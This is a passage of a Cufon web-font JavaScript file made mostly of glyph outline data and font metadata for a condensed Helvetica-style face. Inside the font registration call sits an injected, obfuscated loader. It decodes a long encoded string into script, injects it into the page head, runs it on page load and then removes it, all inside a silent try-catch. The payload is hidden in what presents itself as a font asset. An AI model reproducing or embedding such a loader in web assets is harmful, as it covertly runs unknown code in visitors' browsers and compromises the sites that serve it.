","w":206,"k":{"Y":20,"W":6,"V":6,".":13,",":13}},{"d":"162,47r-38,-43r-24,1v-93,0,-92,-52,-92,-134v0,-80,-1,-133,92,-133v93,0,93,53,93,133v0,47,0,85,-18,108r30,31xm118,-129v0,-75,-3,-86,-18,-86v-15,0,-18,11,-18,86v0,75,3,87,18,87v15,0,18,-12,18,-87","w":200},{"d":"117,-73r0,-184r72,0v-9,110,39,262,-89,262v-70,0,-88,-28,-88,-92r0,-170r72,0r0,184v0,22,2,31,16,31v14,0,17,-9,17,-31","w":200,"k":{"\u0104":6,"\u00c4":6,"A":6,".":6,",":6}},{"d":"97,-58v11,-63,15,-134,24,-199r76,0r-54,257r-93,0r-54,-257r78,0","w":193,"k":{"\u0173":6,"\u016b":6,"\u0119":9,"\u0117":9,"\u0105":11,"\u0104":13,"\u00fc":6,"\u00f6":9,"\u00e4":11,"\u00c4":13,"u":6,"o":9,"e":9,"a":11,"G":6,"A":13,";":6,":":6,".":33,"-":11,",":33}},{"d":"94,-118v-17,0,-17,14,-17,39v0,24,0,39,17,39v17,0,17,-15,17,-39v0,-25,0,-39,-17,-39xm177,-188r-67,0v1,-13,-3,-22,-16,-22v-19,-5,-16,38,-14,58v10,-13,25,-18,41,-18v56,0,62,46,62,78v0,65,-21,97,-89,97v-87,0,-89,-59,-89,-120v0,-75,0,-140,89,-140v56,0,81,15,83,67","w":187},{"d":"105,-123v1,-19,-1,-39,-16,-36v-13,-3,-15,18,-14,36r30,0xm168,-68v1,51,-29,73,-78,73v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102v80,0,80,51,80,114r-95,0v2,21,-7,50,15,50v13,0,15,-12,15,-32r63,0","w":173,"k":{"y":2,"x":4,"w":2,"v":2}},{"d":"23,66r0,-323r101,0r0,50r-38,0r0,224r38,0r0,49r-101,0","w":119},{"d":"55,66r-59,0v59,-94,55,-229,0,-323r59,0v66,95,66,230,0,323","w":119},{"d":"214,-257r68,0r-43,257r-77,0r-22,-173r-21,173r-78,0r-42,-257r69,0r18,182r23,-182r63,0r26,182","w":280,"k":{"\u0119":9,"\u0117":9,"\u0105":11,"\u0104":13,"\u00f6":9,"\u00e4":11,"\u00c4":13,"o":9,"e":9,"a":11,"A":13,".":27,"-":6,",":27}},{"d":"97,-176v-15,24,-25,53,-39,78r39,0r0,-78xm2,-98r80,-152r80,0r0,152r23,0r0,54r-23,0r0,44r-65,0r0,-44r-95,0r0,-54","w":187},{"d":"20,-195r0,-57r70,0r0,57r24,0r0,46r-24,0r0,86v-3,18,11,20,24,17r0,47v-43,1,-94,15,-94,-43r0,-107r-21,0r0,-46r21,0","w":113},{"d":"14,0r0,-257r155,0r0,58r-83,0r0,40r77,0r0,56r-77,0r0,45r86,0r0,58r-158,0"},{"d":"15,-118r0,-77r63,0r0,77r-63,0xm15,0r0,-76r63,0r0,76r-63,0","w":93},{"d":"79,5v-59,-2,-74,-47,-74,-103v0,-55,8,-102,85,-102v80,0,80,51,80,114r-95,0v2,21,-7,50,15,50v13,0,15,-12,15,-32r63,0v0,43,-19,63,-54,71v-19,19,-27,23,-31,45v1,22,27,14,42,6r9,19v-29,18,-91,24,-90,-21v1,-21,16,-35,35,-47xm105,-123v1,-19,-1,-39,-16,-36v-13,-3,-15,18,-14,36r30,0","w":173,"k":{"y":2,"x":4,"w":2,"v":2}},{"d":"17,-25r0,-52r182,0r0,52r-182,0xm17,-105r0,-52r182,0r0,52r-182,0","w":216},{"d":"9,-179v6,-62,26,-83,86,-83v73,0,85,36,85,79r-67,0v1,-17,0,-32,-17,-32v-11,0,-17,10,-17,20v0,51,107,25,107,117v0,59,-27,83,-94,83v-58,1,-87,-21,-85,-82r70,0v-1,18,1,35,18,35v25,-1,20,-46,2,-49v-37,-18,-93,-37,-88,-88","w":193,"k":{".":6,",":6}},{"d":"75,-98v0,45,2,58,15,58v13,0,15,-13,15,-58v0,-45,-2,-57,-15,-57v-13,0,-15,12,-15,57xm90,-200v77,0,85,47,85,102v0,55,-8,103,-85,103v-77,0,-85,-48,-85,-103v0,-55,8,-102,85,-102","k":{"y":6,"x":4,"w":2,"v":2}},{"d":"86,-159v16,-30,27,-66,42,-98r78,0r-63,113r71,144r-81,0r-37,-85v-15,17,-9,54,-10,85r-72,0r0,-257r72,0r0,98","w":206,"k":{"\u0119":4,"\u0117":4,"\u00f6":4,"y":11,"o":4,"e":4}},{"d":"166,0v-21,20,-31,24,-35,48v1,22,28,14,43,6r9,19v-29,18,-91,25,-90,-21v0,-14,10,-32,42,-52r-8,-39r-48,0r-7,39r-75,0r61,-257r91,0r60,257r-43,0xm119,-95r-16,-106r-17,106r33,0","w":206,"k":{"\u0172":6,"\u016a":6,"\u00dc":6,"y":11,"w":9,"v":9,"p":-4,"Y":27,"W":13,"V":13,"U":6,"T":20,"G":6}},{"d":"6,-53r66,-88r-62,0r0,-54r148,0r0,52r-69,89r71,0r0,54r-154,0r0,-53xm48,-214r-20,-52r45,0r13,29r10,-29r48,0r-22,52r-74,0","w":166,"k":{"\u0119":2,"\u0117":2,"\u00f6":2,"o":2,"e":2}},{"d":"14,0r0,-257r104,0r22,157r24,-157r102,0r0,257r-68,0r0,-187r-32,187r-52,0r-32,-187r0,187r-68,0","w":280},{"d":"148,-118r-40,-86r-40,86r-53,0r63,-132r60,0r63,132r-53,0","w":216},{"d":"9,-179v6,-62,26,-83,86,-83v73,0,85,36,85,79r-67,0v1,-17,0,-32,-17,-32v-11,0,-17,10,-17,20v0,51,107,25,107,117v0,59,-27,83,-94,83v-58,1,-87,-21,-85,-82r70,0v-1,18,1,35,18,35v25,-1,20,-46,2,-49v-37,-18,-93,-37,-88,-88xm60,-274r-21,-51r46,0r12,29r11,-29r47,0r-21,51r-74,0","w":193,"k":{".":6,",":6}},{"d":"8,-129v0,-80,-1,-133,92,-133v93,0,93,53,93,133v0,82,0,134,-93,134v-93,0,-92,-52,-92,-134xm118,-129v0,-75,-3,-86,-18,-86v-15,0,-18,11,-18,86v0,75,3,87,18,87v15,0,18,-12,18,-87","w":200,"k":{"\u0104":4,"\u00c4":4,"Y":11,"X":6,"V":4,"A":4,".":6,",":6}},{"d":"121,-164r0,-93r72,0r0,257r-72,0r0,-104r-35,0r0,104r-72,0r0,-257r72,0r0,93r35,0","w":206},{"d":"77,-78v0,17,-3,38,16,38v16,0,15,-15,15,-33v0,-30,-7,-37,-38,-35r0,-43v26,0,37,2,37,-35v0,-10,-1,-24,-15,-24v-14,0,-16,11,-16,32r-65,0v3,-59,30,-77,87,-77v59,0,78,25,78,69v1,24,-12,47,-35,54v28,6,39,29,39,57v0,59,-32,80,-88,80v-47,0,-87,-14,-85,-83r70,0","w":187},{"d":"120,-257r79,0r-56,127r61,130r-82,0r-22,-79r-22,79r-82,0r61,-130r-56,-127r80,0r19,74","w":200}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-56-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("k$Z*RYL`>mTvkG)xFY@10$0TfOL*ZYTvfOy1>m4=Zt}Pc+`dgOFJFW8IM!t1RD)JFW8IM$MUf+IlFBZ$s$UJFW88lG!D@$Q0ykoMLpzg4BW6tmfcZ>RJFs9.^d?C)Y=7r|2Puvn#I1+`*O:%U&x}T[KILY0=>myFsWP2fQ6#M$6`RfLJFW8ILY@I6=IJFW0#MmLJFW8IL+yQfQ6#MWDOc1LJFW8#Z$ZJFW8IL+LZcfZJFW8IL?@JFW8IMW^JFW8IMYZ#g@I*M!lCc*I*M!D1ZfrJFW8#ZYM.>OZJo*I*M!l^M!lJFW8IMWFTf@IJFW8+LOtJFW0#MmtJFW8#Z!ZMfQ6#MWFCL+%|y67KfQ6#M$cOtG#10m7Ck@I*M!D#Z!.ug)I*M!l?L$.vs+@>Z!tJ0=Fp6D44ttcOZtPrt+4`4WrJFW8IMWCT6OTofQ6#MW8`fQ6#MWF)WtUJFW8IL?lzB!Lc0dU+J$IrFG.d0dCP>W`#oQ8TcdU#o$#TJGUPZmU=F$.PZ+*doYcvZOIUJ$^+zfuTpO)Yk$0vROPTo*%7z+r:F:FJodCKk!}&R$TCFY)Pct#vRQgryGTro=4)J:g7R$T?cf4rRO%v>$T+F$U^Rm6rkmZnJd.x>WIPp1P2>B)=mOLR>t*FzflR>t*TkB.r")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"HelveticaXBlkCn","font-weight":900,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 8 6 4 5 2 5 2 4","ascent":"257","descent":"-103","x-height":"5","bbox":"-12 -325 282 86.7944","underline-thickness":"18","underline-position":"-18","stemh":"54","stemv":"70","unicode-range":"U+0021-U+201E"}}));
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"17,-121v2,-72,-16,-124,66,-136r0,31v-22,3,-30,15,-30,34r30,0r0,71r-66,0xm104,-121v2,-73,-15,-123,67,-136r0,31v-22,3,-30,15,-30,34r30,0r0,71r-67,0","w":186},{"d":"14,60r0,-323r119,0r0,55r-55,0r0,213r55,0r0,55r-119,0","w":146},{"d":"19,0r0,-187r69,0v1,9,-2,23,1,30v14,-29,38,-41,73,-32r0,63v-37,-11,-71,-1,-71,52r0,74r-72,0","w":159,"k":{"\u0119":6,"\u0117":6,"\u010d":6,"\u00f6":6,"y":-4,"w":-4,"v":-4,"q":6,"o":6,"n":-6,"e":6,"d":6,"c":6,".":33,"-":20,",":33}},{"d":"23,0r0,-71r75,0v4,72,1,138,-75,136r0,-31v18,-1,31,-17,32,-34r-32,0","w":120},{"d":"17,-67r0,-59r113,0r0,59r-113,0","w":146},{"d":"19,60r0,-247r69,0v1,6,-2,16,1,21v9,-12,20,-26,55,-26v53,0,78,52,78,99v0,44,-16,98,-79,98v-22,0,-41,-10,-52,-26r0,81r-72,0xm120,-140v-45,1,-45,92,0,93v45,-1,43,-92,0,-93","w":233},{"d":"105,-244r0,57r38,0r0,44r-38,0v5,38,-20,102,38,89r0,54v-53,1,-109,16,-109,-54r0,-89r-32,0r0,-44r32,0r0,-57r71,0","w":146},{"d":"92,-257r0,50r-71,0r0,-50r71,0xm21,0r0,-187r71,0r0,187r-71,0","w":113},{"d":"21,0r0,-257r79,0r0,257r-79,0","w":119},{"d":"114,-47v45,-1,43,-93,0,-93v-45,1,-45,92,0,93xm214,-187r0,247r-71,0v-1,-26,2,-57,-1,-81v-11,16,-29,26,-51,26v-63,0,-80,-54,-80,-98v0,-47,26,-99,79,-99v36,0,44,15,55,26r0,-21r69,0","w":233},{"d":"14,-125v0,-96,61,-128,106,-128v46,0,107,32,107,128v0,96,-62,128,-107,128v-45,0,-106,-32,-106,-128xm82,-125v0,26,2,73,38,73v36,0,38,-46,38,-73v0,-26,-1,-73,-37,-73v-37,0,-39,46,-39,73"},{"d":"214,-187r0,187r-69,0v-1,-7,2,-18,-1,-24v-29,47,-125,38,-125,-35r0,-128r72,0r0,98v0,22,2,37,23,37v13,0,29,-6,29,-36r0,-99r71,0","w":233},{"d":"21,0r0,-257r79,0r0,89r74,0r0,-89r79,0r0,257r-79,0r0,-102r-74,0r0,102r-79,0","w":273},{"d":"77,-61v-1,23,46,32,52,7v0,-11,-6,-13,-39,-19v-54,-9,-77,-27,-77,-59v0,-47,52,-60,89,-60v40,0,88,12,90,60r-65,0v2,-21,-42,-30,-45,-6v9,22,41,13,71,25v24,9,44,21,44,52v0,52,-50,66,-95,66v-44,0,-92,-18,-93,-66r68,0","w":206},{"d":"92,-257r0,50r-71,0r0,-50r71,0xm92,-13v8,69,-37,78,-103,73r0,-56v20,1,33,1,32,-23r0,-168r71,0r0,174","w":113},{"d":"200,-257r0,164v0,71,-32,99,-97,99v-73,-1,-99,-43,-94,-114r71,0v1,25,-4,53,22,53v20,0,19,-24,19,-36r0,-166r79,0","w":219},{"d":"133,-263r0,55v-44,-7,-31,36,-31,74v0,27,-28,29,-43,33v17,1,43,3,43,35v0,33,-17,75,31,71r0,55v-47,2,-92,2,-92,-46r0,-64v0,-21,-23,-24,-31,-24r0,-55v8,0,31,-1,31,-20r0,-68v4,-48,45,-48,92,-46","w":146},{"d":"144,-94v0,-20,-4,-46,-31,-46v-27,0,-30,26,-30,46v0,20,3,47,30,47v27,0,31,-27,31,-47xm215,-94v0,52,-32,99,-102,99v-70,0,-101,-47,-101,-99v0,-51,31,-98,101,-98v70,0,102,47,102,98xm42,-209r0,-47r61,0r0,47r-61,0xm123,-209r0,-47r62,0r0,47r-62,0","w":226},{"d":"31,-187v-7,-57,44,-80,109,-69r0,49v-19,-4,-43,-4,-39,20r38,0r0,44r-36,0r0,143r-72,0r0,-143r-29,0r0,-44r29,0","w":140,"k":{"f":6}},{"d":"260,-161r-77,0v-2,-9,-9,-38,-42,-38v-68,0,-67,141,0,141v27,0,37,-19,42,-43r78,0v0,52,-43,107,-118,107v-83,0,-130,-59,-130,-135v0,-81,51,-134,130,-134v71,0,110,37,117,102xm215,-329r-44,53r-59,0r-44,-53r53,0r20,27r21,-27r53,0","w":273},{"d":"114,-47v44,-1,44,-92,0,-93v-46,1,-44,92,0,93xm214,-257r0,257r-69,0v-1,-6,2,-16,-1,-21v-9,12,-19,26,-54,26v-53,0,-79,-52,-79,-99v0,-44,17,-98,80,-98v23,-1,39,12,52,26r0,-91r71,0","w":233},{"d":"140,-116v-1,-15,-10,-24,-26,-24v-27,0,-31,24,-31,47v0,23,4,46,31,46v15,0,27,-13,28,-28r68,0v-7,51,-47,80,-97,80v-56,0,-101,-39,-101,-98v0,-114,185,-138,196,-23r-68,0xm187,-260r-44,54r-59,0r-43,-54r53,0r20,28r20,-28r53,0","w":219},{"d":"157,-184v-4,-10,-14,-18,-30,-18v-27,0,-40,27,-43,52v50,-44,141,-12,141,60v0,62,-44,93,-103,93v-76,0,-107,-57,-107,-119v0,-79,37,-137,114,-137v54,0,86,20,94,69r-66,0xm122,-122v-20,0,-34,14,-34,33v0,20,14,35,34,35v22,0,37,-16,37,-35v0,-18,-14,-33,-37,-33"},{"d":"260,-161r-77,0v-2,-9,-9,-38,-42,-38v-68,0,-67,141,0,141v27,0,37,-19,42,-43r78,0v0,52,-43,107,-118,107v-83,0,-130,-59,-130,-135v0,-81,51,-134,130,-134v71,0,110,37,117,102","w":273},{"d":"150,-179v3,-19,-15,-27,-32,-27v-11,0,-29,3,-29,17v0,18,39,23,75,32v36,10,72,27,72,75v0,67,-61,88,-119,88v-29,0,-113,-10,-113,-92r80,0v-3,26,19,36,40,35v13,0,33,-4,33,-23v0,-13,-11,-17,-55,-30v-41,-12,-88,-22,-88,-74v0,-59,51,-85,104,-85v56,0,105,22,107,84r-75,0xm197,-329r-44,54r-59,0r-44,-54r53,0r20,28r21,-28r53,0"},{"d":"77,-61v-1,23,46,32,52,7v0,-11,-6,-13,-39,-19v-54,-9,-77,-27,-77,-59v0,-47,52,-60,89,-60v40,0,88,12,90,60r-65,0v2,-21,-42,-30,-45,-6v9,22,41,13,71,25v24,9,44,21,44,52v0,52,-50,66,-95,66v-44,0,-92,-18,-93,-66r68,0xm180,-260r-44,54r-59,0r-44,-54r53,0r21,28r20,-28r53,0","w":206},{"d":"108,52v0,-22,28,-46,37,-52v-1,-7,2,-18,-1,-24v-29,47,-125,38,-125,-35r0,-128r72,0r0,98v0,22,2,37,23,37v13,0,29,-6,29,-36r0,-99r71,0r0,187r-45,0v-20,21,-27,35,-27,45v2,18,19,13,28,1r20,10v-13,20,-20,26,-45,28v-18,1,-37,-10,-37,-32","w":233},{"d":"21,0r0,-257r79,0r0,191r113,0r0,66r-192,0","w":226,"k":{"y":13,"Y":40,"W":20,"V":33,"T":46}},{"d":"86,3v5,8,13,21,25,20v28,-2,31,-36,27,-60v-12,17,-28,26,-50,26v-55,0,-80,-41,-80,-91v0,-73,90,-124,131,-62r0,-23r71,0r0,163v0,37,-10,89,-97,89v-44,0,-91,-12,-98,-62r71,0xm79,-103v0,21,6,46,32,46v43,-1,39,-83,-2,-83v-21,0,-30,17,-30,37","w":226},{"d":"254,-257r0,158v0,72,-38,105,-117,105v-79,0,-118,-33,-118,-105r0,-158r80,0r0,140v0,26,-1,59,38,59v37,0,38,-33,38,-59r0,-140r79,0xm66,-279r0,-47r61,0r0,47r-61,0xm147,-279r0,-47r61,0r0,47r-61,0","w":273},{},{"d":"254,-257r0,158v0,72,-38,105,-117,105v-79,0,-118,-33,-118,-105r0,-158r80,0r0,140v0,26,-1,59,38,59v37,0,38,-33,38,-59r0,-140r79,0","w":273},{"d":"21,0r0,-257r71,0r0,124r46,-54r80,0r-66,71r77,116r-86,0r-38,-68r-13,14r0,54r-71,0","w":219},{"d":"85,-145r-67,0v-4,-69,38,-108,106,-108v61,0,102,25,102,78v1,65,-64,83,-110,114r114,0r0,61r-217,0v-2,-74,60,-101,107,-130v13,-8,33,-18,33,-36v0,-23,-13,-31,-30,-31v-29,0,-39,21,-38,52"},{"d":"61,0r0,-71r75,0r0,71r-75,0xm201,-189v5,66,-67,46,-69,97r-66,0v-3,-27,-1,-48,25,-64v11,-7,33,-12,33,-28v0,-12,-7,-18,-21,-18v-17,0,-23,15,-22,31r-76,0v3,-45,29,-92,100,-92v70,0,94,42,96,74","w":206},{"d":"216,-77r-136,0v-2,36,46,47,66,23r66,0v-14,40,-54,59,-96,59v-60,0,-104,-36,-104,-98v0,-54,39,-99,98,-99v74,0,106,42,106,115xm80,-114r68,0v0,-17,-13,-32,-31,-32v-22,0,-34,12,-37,32xm86,-209r0,-47r61,0r0,47r-61,0","w":226},{"d":"21,0r0,-257r212,0r0,66r-133,0r0,32r121,0r0,61r-121,0r0,32r137,0r0,66r-216,0xm98,-279r0,-47r61,0r0,47r-61,0","w":253},{"d":"100,-196r0,51v33,-3,71,12,76,-25v4,-28,-44,-27,-76,-26xm184,0v-14,-34,5,-87,-42,-90r-42,0r0,90r-79,0r0,-257v97,6,231,-29,234,73v0,27,-12,55,-38,65v41,11,33,75,46,119r-79,0","w":266,"k":{"Y":13,"W":6,"V":1,"T":6}},{"d":"92,-129v0,57,31,71,51,71v20,0,51,-14,51,-71v0,-57,-31,-70,-51,-70v-20,0,-51,13,-51,70xm13,-129v0,-78,52,-134,130,-134v78,0,131,56,131,134v0,78,-53,135,-131,135v-78,0,-130,-57,-130,-135xm72,-279r0,-47r61,0r0,47r-61,0xm154,-279r0,-47r61,0r0,47r-61,0","w":286},{"d":"23,0r0,-71r75,0r0,71r-75,0xm23,-116r0,-71r75,0r0,71r-75,0","w":120},{"d":"96,52v0,-23,31,-46,42,-52v-3,-5,-1,-15,-4,-18v-35,39,-126,30,-126,-34v0,-59,70,-57,106,-64v10,-2,19,-4,19,-16v0,-13,-11,-17,-23,-17v-22,0,-27,11,-27,19r-66,0v2,-53,52,-62,96,-62v147,2,61,93,97,192r-46,0v-22,21,-30,35,-30,45v2,18,22,13,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-41,-10,-41,-32xm133,-84v-16,9,-53,7,-52,29v8,29,52,21,52,-12r0,-17","w":219},{"d":"-3,0r95,-257r77,0r94,257r-82,0r-11,-37r-82,0r-11,37r-80,0xm105,-92r49,0r-24,-79xm59,-279r0,-47r61,0r0,47r-61,0xm141,-279r0,-47r61,0r0,47r-61,0","w":259,"k":{"y":6,"w":6,"v":6,"Y":27,"W":13,"V":11,"T":24}},{"d":"212,-54v-13,35,-41,52,-80,58v-13,14,-25,23,-25,41v0,19,22,12,31,1r22,10v-15,20,-24,26,-51,28v-20,1,-42,-10,-41,-32v1,-21,22,-39,35,-48v-55,-6,-91,-40,-91,-97v0,-54,39,-99,98,-99v74,0,106,42,106,115r-136,0v-2,36,46,47,66,23r66,0xm80,-114r68,0v0,-17,-13,-32,-31,-32v-22,0,-34,12,-37,32","w":226},{"d":"21,0r0,-257r198,0r0,66r-119,0r0,32r102,0r0,61r-102,0r0,98r-79,0","w":226,"k":{"\u0104":20,"\u00c4":20,"A":20,".":46,",":46}},{"d":"-5,0r65,-98r-59,-89r79,0r20,37r21,-37r77,0r-59,89r66,98r-78,0r-28,-46r-26,46r-78,0","w":200},{"d":"139,52v0,-23,31,-46,42,-52r-11,-37r-82,0r-11,37r-80,0r95,-257r77,0r94,257r-56,0v-22,21,-30,35,-30,45v2,18,22,13,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-41,-10,-41,-32xm105,-92r49,0r-24,-79","w":259,"k":{"y":6,"w":6,"v":6,"Y":27,"W":13,"V":11,"T":24}},{"d":"144,-94v0,-20,-4,-46,-31,-46v-27,0,-30,26,-30,46v0,20,3,47,30,47v27,0,31,-27,31,-47xm215,-94v0,52,-32,99,-102,99v-70,0,-101,-47,-101,-99v0,-51,31,-98,101,-98v70,0,102,47,102,98","w":226},{"d":"21,0r0,-257r71,0r0,257r-71,0","w":113},{"d":"26,-121r0,-136r55,0r0,136r-55,0","w":106},{"d":"19,0r0,-257r72,0r0,91v11,-16,30,-26,52,-26v63,0,79,54,79,98v0,47,-25,99,-78,99v-36,0,-45,-15,-56,-26r0,21r-69,0xm120,-47v44,-1,44,-92,0,-93v-46,1,-44,92,0,93","w":233},{"d":"21,0r0,-257r81,0r75,137r0,-137r75,0r0,257r-77,0r-79,-140r0,140r-75,0","w":273},{"d":"19,0r0,-187r69,0v1,8,-2,19,1,25v23,-39,90,-41,111,0v3,-2,18,-30,64,-30v96,0,55,109,64,192r-71,0r0,-101v0,-18,-2,-34,-24,-34v-18,0,-24,14,-24,34r0,101r-71,0r0,-101v0,-18,-2,-34,-24,-34v-18,0,-24,14,-24,34r0,101r-71,0","w":346},{"d":"14,52v0,-23,31,-46,42,-52r-35,0r0,-257r79,0r0,257r-18,0v-22,21,-29,35,-29,45v1,19,22,12,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-42,-10,-42,-32","w":119},{"d":"21,0r0,-168v0,-59,34,-95,95,-95v58,0,92,30,92,69v0,37,-24,46,-30,53v3,0,45,9,45,63v0,60,-53,90,-116,78r0,-55v24,8,46,-7,45,-30v0,-28,-21,-34,-45,-34r0,-40v18,0,35,-2,35,-24v0,-15,-9,-23,-24,-23v-20,0,-26,14,-26,32r0,174r-71,0","w":233},{"d":"98,-187r0,71r-75,0r0,-71r75,0xm23,0r0,-71r75,0v4,72,1,138,-75,136r0,-31v18,-1,31,-18,32,-34r-32,0","w":120},{"d":"224,-193r-18,97v0,6,2,9,5,9v13,0,31,-17,31,-58v0,-57,-40,-81,-93,-81v-59,0,-103,41,-103,98v0,90,114,121,175,77r41,0v-26,39,-62,57,-114,57v-79,0,-139,-55,-139,-134v0,-86,62,-135,141,-135v80,0,129,47,129,107v0,84,-71,107,-94,107v-13,0,-19,-7,-22,-18v-29,40,-104,6,-96,-47v-5,-67,75,-116,119,-65r4,-14r34,0xm147,-156v-34,-3,-46,61,-8,63v36,3,48,-63,8,-63","w":288},{"d":"21,0r0,-257r212,0r0,66r-133,0r0,32r121,0r0,61r-121,0r0,32r137,0r0,66r-216,0","w":253},{"d":"113,-192v147,2,61,93,97,192r-72,0v-3,-5,-1,-15,-4,-18v-35,39,-126,30,-126,-34v0,-59,70,-57,106,-64v10,-2,19,-4,19,-16v0,-13,-11,-17,-23,-17v-22,0,-27,11,-27,19r-66,0v2,-53,52,-62,96,-62xm133,-84v-16,9,-53,7,-52,29v8,29,52,21,52,-12r0,-17xm43,-209r0,-47r61,0r0,47r-61,0xm125,-209r0,-47r61,0r0,47r-61,0","w":219},{"d":"0,45r0,-18r180,0r0,18r-180,0","w":180},{"d":"146,52v0,-23,31,-46,42,-52r-167,0r0,-257r212,0r0,66r-133,0r0,32r121,0r0,61r-121,0r0,32r137,0r0,66r-23,0v-22,21,-30,35,-30,45v2,18,22,13,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-41,-10,-41,-32","w":253},{"d":"100,-196r0,39v27,-2,69,10,68,-21v0,-26,-42,-16,-68,-18xm21,0r0,-257r140,0v68,0,82,38,82,64v0,26,-12,41,-31,51v23,8,44,26,44,64v0,103,-134,75,-235,78xm100,-109r0,48v33,-3,76,11,77,-25v1,-32,-47,-21,-77,-23","w":266},{"d":"81,0r0,-191r-72,0r0,-66r223,0r0,66r-72,0r0,191r-79,0","k":{"\u0173":33,"\u016b":33,"\u0119":40,"\u0117":40,"\u010d":40,"\u0105":40,"\u0104":27,"\u00fc":33,"\u0161":40,"\u00f6":40,"\u00e4":40,"\u00c4":27,"y":40,"w":40,"u":33,"s":40,"r":33,"o":40,"e":40,"c":40,"a":40,"A":27,";":31,":":31,".":40,"-":46,",":40}},{"d":"133,-263r0,323r-119,0r0,-55r55,0r0,-213r-55,0r0,-55r119,0","w":146},{"d":"11,52v0,-23,31,-46,42,-52r-32,0r0,-187r71,0r0,187r-13,0v-22,21,-30,35,-30,45v2,18,22,13,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-41,-10,-41,-32xm92,-257r0,50r-71,0r0,-50r71,0","w":113},{"d":"23,0r0,-257r79,0r1,89r70,-89r98,0r-94,100r109,157r-99,0r-63,-100r-22,24r0,76r-79,0","w":280},{"d":"83,-66v1,11,18,17,29,17v31,0,44,-32,44,-51v-50,43,-141,14,-141,-60v0,-60,48,-93,105,-93v73,0,106,56,106,119v0,80,-37,137,-114,137v-46,0,-87,-20,-95,-69r66,0xm118,-197v-19,0,-37,15,-37,35v0,19,17,34,36,34v19,0,36,-14,36,-34v0,-20,-15,-35,-35,-35"},{"d":"123,6v-68,-5,-103,-35,-104,-105r0,-158r80,0r0,140v0,26,-1,59,38,59v37,0,38,-33,38,-59r0,-140r79,0v-5,116,33,263,-101,262v-13,13,-21,24,-24,40v2,18,22,13,31,1r23,10v-15,20,-24,26,-51,28v-20,1,-41,-10,-41,-32v0,-19,20,-37,32,-46","w":273},{"d":"214,-187r0,187r-69,0v-1,-7,2,-18,-1,-24v-29,47,-125,38,-125,-35r0,-128r72,0r0,98v0,22,2,37,23,37v13,0,29,-6,29,-36r0,-99r71,0xm46,-209r0,-47r61,0r0,47r-61,0xm127,-209r0,-47r62,0r0,47r-62,0","w":233},{"d":"80,0r0,-95r-91,-162r88,0r43,95r44,-95r87,0r-92,162r0,95r-79,0","k":{"\u0173":27,"\u016b":27,"\u012f":5,"\u0119":33,"\u0117":33,"\u0105":33,"\u0104":27,"\u00fc":27,"\u00f6":33,"\u00e4":33,"\u00c4":27,"v":20,"u":27,"q":33,"p":27,"o":33,"i":5,"e":33,"a":33,"A":27,";":29,":":33,".":40,"-":40,",":40}},{"d":"100,-191r0,125r31,0v49,0,56,-40,56,-64v0,-16,-4,-61,-62,-61r-25,0xm21,0r0,-257r129,0v85,0,116,63,116,128v0,79,-41,129,-131,129r-114,0","w":280},{"d":"112,-102v-45,-13,-97,-26,-97,-77v0,-59,52,-84,97,-84r0,-29r19,0r0,29v50,0,95,25,95,84r-69,0v-2,-19,-8,-23,-26,-27r0,40v93,20,104,49,104,89v0,39,-28,83,-104,83r0,36r-19,0r0,-36v-76,0,-105,-45,-107,-92r77,0v0,13,3,33,30,35r0,-51xm131,-96r0,45v17,-1,30,-8,30,-22v0,-13,-11,-17,-30,-23xm112,-170r0,-36v-13,0,-26,2,-26,16v0,10,9,17,26,20"},{"d":"199,-75r0,55r-182,0r0,-55r182,0xm199,-162r0,55r-182,0r0,-55r182,0","w":216},{"d":"211,0r-2,-26v-18,23,-45,32,-73,32v-76,0,-123,-59,-123,-132v0,-173,223,-178,245,-41r-76,0v-3,-19,-18,-32,-37,-32v-54,0,-53,57,-53,75v0,24,10,66,58,66v18,0,37,-9,41,-28r-35,0r0,-55r105,0r0,141r-50,0","w":280},{"d":"199,-185r0,58r-98,36r98,36r0,58r-182,-71r0,-45","w":216},{"d":"113,-192v147,2,61,93,97,192r-72,0v-3,-5,-1,-15,-4,-18v-35,39,-126,30,-126,-34v0,-59,70,-57,106,-64v10,-2,19,-4,19,-16v0,-13,-11,-17,-23,-17v-22,0,-27,11,-27,19r-66,0v2,-53,52,-62,96,-62xm133,-84v-16,9,-53,7,-52,29v8,29,52,21,52,-12r0,-17","w":219},{"d":"274,-7r-35,35r-35,-36v-89,44,-191,-20,-191,-121v0,-78,52,-134,130,-134v116,0,168,142,101,224xm132,-82r36,-34r21,22v3,-9,5,-22,5,-35v0,-57,-31,-70,-51,-70v-20,0,-51,13,-51,70v0,62,30,74,62,70","w":286},{"d":"77,-79v5,37,76,32,76,-8v0,-39,-56,-46,-72,-19r-67,0r26,-145r172,0r0,62r-117,0v-1,10,-7,24,-6,33v58,-33,136,-11,136,71v0,51,-40,88,-112,88v-92,0,-110,-57,-107,-82r71,0"},{"d":"316,-187r-59,187r-73,0r-28,-115r-28,115r-73,0r-58,-187r74,0r28,116r24,-116r67,0r26,116r26,-116r74,0","w":313,"k":{".":20,",":20}},{"d":"-4,0r93,-137r-85,-120r93,0r39,70r38,-70r88,0r-83,121r92,136r-95,0r-44,-77r-46,77r-90,0","w":266},{"d":"54,-263r62,0v-43,114,-44,209,0,323r-62,0v-53,-104,-52,-219,0,-323","w":113},{"d":"94,-257v4,65,-11,112,-20,164r-35,0v-9,-52,-24,-99,-20,-164r75,0xm19,0r0,-71r75,0r0,71r-75,0","w":113},{"d":"0,6r100,-269r55,0r-101,269r-54,0","w":153},{"d":"13,4v20,-1,46,6,45,-16v-15